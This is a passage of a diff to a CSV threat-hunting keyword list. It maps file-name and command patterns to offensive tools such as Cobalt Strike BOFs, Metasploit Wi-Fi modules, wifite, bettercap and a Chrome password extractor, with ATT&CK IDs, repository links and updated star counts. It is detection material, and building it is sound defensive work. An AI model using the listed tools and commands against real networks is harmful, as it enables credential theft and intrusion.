the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034 ","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" -"*Whirlpool-Orig-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Whirlpool-Tweak-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Whisker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Whirlpool-Orig-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Whirlpool-Tweak-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Whisker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*whiskeysaml.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*whiskeysamlandfriends*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" -"*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*whoami /user*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" -"*whoami.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*whoami.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*WhoamiGetTokenInfo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*wifi/airpwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*wifi/dnspwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*whoami.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*whoami.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*WhoamiGetTokenInfo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*wifi/airpwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wifi/dnspwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wifi_dos_own.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*wifi_dos3.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" "*wifi_dump_linux*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*wifi_fake_auth.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" 
+"*wifi_fake_auth.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*WiFi_Hacker.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" -"*wifi_pineapple_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*wifi_recon_handshakes*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*wifi-arsenal*","offensive_tool_keyword","wifi-arsenal","github repo with all the wireless exploitation tools available","N/A","N/A","N/A","N/A","Network Exploitation 
tools","https://github.com/0x90/wifi-arsenal","1","1","N/A","N/A","10","1690","401","2020-07-06T00:46:06Z","2015-03-22T18:38:03Z" +"*wifi_pineapple_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*wifi_recon_handshakes*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*wifi-arsenal*","offensive_tool_keyword","wifi-arsenal","github repo with all the wireless exploitation tools available","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/0x90/wifi-arsenal","1","1","N/A","N/A","10","1692","401","2020-07-06T00:46:06Z","2015-03-22T18:38:03Z" "*wifibroot.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" -"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1094","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" -"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1094","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" -"*wifidump.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/DanMcInerney/wifijammer","1","1","N/A","N/A","10","3750","797","2023-07-04T01:43:51Z","2014-01-26T07:54:39Z" -"*wifiphisher*","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Frameworks","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","10","12107","2517","2023-09-26T19:58:05Z","2014-09-26T12:47:28Z" +"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1097","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" +"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1097","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" +"*wifidump.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 
- T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/DanMcInerney/wifijammer","1","1","N/A","N/A","10","3751","797","2023-07-04T01:43:51Z","2014-01-26T07:54:39Z" +"*wifiphisher*","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Frameworks","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","10","12111","2518","2023-09-26T19:58:05Z","2014-09-26T12:47:28Z" "*WiFi-Pumpkin*","offensive_tool_keyword","WiFi-Pumpkin","Framework for Rogue Wi-Fi Access Point Attack.","T1562 - T1530 - T1552 - T1553 - T1561","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/P0cL4bs/WiFi-Pumpkin","1","1","N/A","N/A","10","3059","750","2020-04-18T19:32:52Z","2015-06-27T00:56:21Z" -"*wifite --crack*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite --crack*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" "*wifite --dict *.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*wifite -e *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite -e *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" "*wifite --kill*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*wifite --wep *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" -"*Wifite.py*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" -"*wifite2.git*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite --wep *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*Wifite.py*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite2.git*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" "*win_chrome_password_extractor.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*win_fake_malware.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*win_fake_malware.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
